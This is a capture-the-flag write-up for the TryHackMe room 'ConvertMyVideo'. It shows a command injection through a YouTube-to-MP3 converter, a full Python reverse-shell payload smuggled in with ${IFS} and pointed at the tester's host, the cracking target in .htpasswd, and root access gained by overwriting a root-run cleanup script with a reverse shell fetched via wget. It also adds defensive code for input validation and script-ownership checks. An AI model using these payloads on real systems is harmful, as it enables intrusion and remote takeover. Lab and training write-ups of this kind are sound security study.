TryHackMe "ConvertMyVideo"
April 22nd, 2023

Introduction
ConvertMyVideo is a medium-difficulty room released on May 2nd, 2020 by overjt.
User Own
What is the name of the secret folder?
Nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 15:25 EDT
Nmap scan report for 10.10.xx.xx
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 651bfc741039dfddd02df0531ceb6dec (RSA)
| 256 c42804a5c3b96a955a4d7a6e46e214db (ECDSA)
|_ 256 ba07bbcd424af293d105d0b34cb1d9b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3737/tcp filtered xpanel
5850/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds
The host is running a website that converts YouTube videos to MP3 files. Running ffuf against the site shows a subdirectory called admin, which answers with a 401 (it is password-protected).
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.xx.xx/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2563ms]
* FUZZ: .htpasswd
[Status: 401, Size: 460, Words: 42, Lines: 15, Duration: 163ms]
* FUZZ: admin
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
* FUZZ: .hta
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
* FUZZ: .htaccess
[Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 160ms]
* FUZZ: images
[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 158ms]
* FUZZ: js
[Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5429ms]
* FUZZ: index.php
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 160ms]
* FUZZ: server-status
[Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 160ms]
* FUZZ: tmp
:: Progress: [4713/4713] :: Job [1/1] :: 178 req/sec :: Duration: [0:00:32] :: Errors: 0 ::
What is the user to access the secret folder?
The website takes a YouTube video ID as input. Submitting an empty ID reveals that the site is using youtube-dl. Checking the site's JavaScript in main.js shows that the input is simply concatenated onto the base YouTube URL before being posted to the server.
    $(function () {
        $("#convert").click(function () {
            $("#message").html("Converting...");
            // The ID from the text box is appended to the URL with no validation;
            // the server receives yt_url and builds its youtube-dl command from it.
            $.post("/", { yt_url: "https://www.youtube.com/watch?v=" + $("#ytid").val() }, function (data) {
                try {
                    data = JSON.parse(data);
                    if (data.status == "0") {
                        $("#message").html("<a href='" + data.result_url + "'>Download MP3</a>");
                    }
                    else {
                        console.log(data);
                        $("#message").html("Oops! something went wrong");
                    }
                } catch (error) {
                    console.log(data);
                    $("#message").html("Oops! something went wrong");
                }
            });
        });
    });
Using the input --;id; shows that the website is vulnerable to command injection: the output field contains the result of id, and the "sh: 1: -f: not found" error shows the remainder of the server's original command being executed as a separate command after the injected one.
{
"status": 127,
"errors": "WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nUsage: youtube-dl [OPTIONS] URL [URL...]\n\nyoutube-dl: error: You must provide at least one URL.\nType youtube-dl --help to see a list of all options.\nsh: 1: -f: not found\n",
"url_orginal": "--;id;",
"output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
"result_url": "/tmp/downloads/6444366a5e64a.mp3"
}
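The root cause is that the server hands the raw ID to a shell. The following is an added example, not the room's code and not the site's PHP: a Python sketch of a safe server-side handler that allow-lists the ID and invokes youtube-dl without a shell. The 11-character ID alphabet and the youtube-dl flags are assumptions.

```python
import re
import subprocess
from typing import List, Optional

# Assumption: YouTube video IDs are 11 characters from [A-Za-z0-9_-].
# Anything else (";", "$", "{", spaces, "--;id;") is rejected before any command runs.
_YT_ID = re.compile(r"[A-Za-z0-9_-]{11}")


def validate_youtube_id(value: str) -> Optional[str]:
    """Return the ID unchanged if it matches the strict allow-list, else None."""
    return value if _YT_ID.fullmatch(value) else None


def build_youtube_dl_argv(yt_id: str) -> List[str]:
    """argv for youtube-dl, for an already validated ID.

    The list form runs the program directly (no /bin/sh), so metacharacters such
    as ';' or '${IFS}' would reach youtube-dl as literal text rather than being
    interpreted. '--' ends option parsing so an ID that starts with '-' (valid
    for YouTube) cannot be taken as an option. The flags are assumed, not the room's.
    """
    url = "https://www.youtube.com/watch?v=" + yt_id
    return ["youtube-dl", "-x", "--audio-format", "mp3", "--", url]


def convert(raw_input: str, run=subprocess.run) -> dict:
    """Handle one request; the response shape mirrors the room's JSON keys.

    `run` is injectable so the logic can be exercised without youtube-dl installed.
    """
    yt_id = validate_youtube_id(raw_input)
    if yt_id is None:
        # Rejected input never reaches the subprocess.
        return {"status": 1, "errors": "invalid video id", "output": ""}
    proc = run(build_youtube_dl_argv(yt_id), shell=False,
               capture_output=True, text=True, timeout=120)
    return {"status": proc.returncode, "errors": proc.stderr, "output": proc.stdout}


if __name__ == "__main__":
    # The room's injection payload is refused; a well-formed ID passes validation.
    print(convert("--;id;"))
    print(validate_youtube_id("dQw4w9WgXcQ"))
```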
A Python reverse shell can be used to get in as www-data.
--;python${IFS}-c${IFS}'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.xx.xx",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")';
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 43554
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
ls
admin images index.php js style.css tmp
Checking the admin directory:
ls admin -a
. .. .htaccess .htpasswd flag.txt index.php
The contents of .htpasswd are:
$ cat admin/.htpasswd
cat admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/
The login credentials for the admin page are the username itsmeadmin and a hashed password (the $apr1$ prefix marks Apache's MD5-based htpasswd format).
What is the user flag?
The user flag is inside the admin directory.
$ cat admin/flag.txt
cat admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}
The flag is flag{0d8486a0c0c42503bb60ac77f4046ed7}.
System Own
What is the root flag?
Inside tmp is a file called clean.sh. Replacing the contents of clean.sh with a reverse shell will eventually get you in as root, because root runs this file periodically to remove all downloaded files. The file is writable by www-data, which is the whole weakness: serve the replacement from the attacking machine and fetch it onto the target, then wait for the next run.
python3 -m http.server 80
wget http://10.6.xx.xx/clean.sh -O clean.sh
--2023-04-22 20:00:08-- http://10.6.xx.xx/clean.sh
Connecting to 10.6.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49 [text/x-sh]
Saving to: 'clean.sh'
clean.sh 100%[===================>] 49 --.-KB/s in 0s
2023-04-22 20:00:09 (8.09 MB/s) - 'clean.sh' saved [49/49]
nc -nvlp 1235
listening on [any] 1235 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 54788
mesg: ttyname failed: Inappropriate ioctl for device
cat /root/root.txt
flag{d9b368018e912b541a4eb68399c5e94a}
The root flag inside /root/root.txt is flag{d9b368018e912b541a4eb68399c5e94a}.
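The escalation works only because root executes a file that www-data can rewrite. As an added example (not the room's code), here is a guard that a root cron job could run before executing a cleanup script; it assumes GNU coreutils stat and checks ownership, the file's group/other write bits and the containing directory's write bits.

```shell
#!/bin/sh
# Added example, not part of the room: refuse to run a script that the
# executing user does not own, or that anyone else could have rewritten.
# Assumes GNU coreutils stat (Linux). Only the immediate parent directory
# is checked, not the whole path.

script_is_trusted() {
    f="$1"
    me=$(id -un)

    # Must be a regular file, not a symlink that could be repointed.
    [ -f "$f" ] && [ ! -L "$f" ] || { echo "refuse: $f is not a regular file" >&2; return 1; }

    # Owner must be the user who will execute it (root, for a root cron job).
    owner=$(stat -c '%U' "$f")
    [ "$owner" = "$me" ] || { echo "refuse: $f owned by $owner, not $me" >&2; return 1; }

    # Symbolic mode looks like -rwxr-xr-x; char 6 = group write, char 9 = other write.
    case "$(stat -c '%A' "$f")" in
        ?????w*|????????w*) echo "refuse: $f is group/world-writable" >&2; return 1 ;;
    esac

    # The directory must not let other users replace the file.
    dir=$(dirname "$f")
    case "$(stat -c '%A' "$dir")" in
        ?????w*|????????w*) echo "refuse: $dir is group/world-writable" >&2; return 1 ;;
    esac
    return 0
}

# run_cleanup SCRIPT: what the cron entry could call instead of a bare "sh SCRIPT".
run_cleanup() {
    script_is_trusted "$1" && sh "$1"
}
```

A script such as the room's tmp/clean.sh, owned by www-data, fails the owner check and is never executed.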
And that's the room!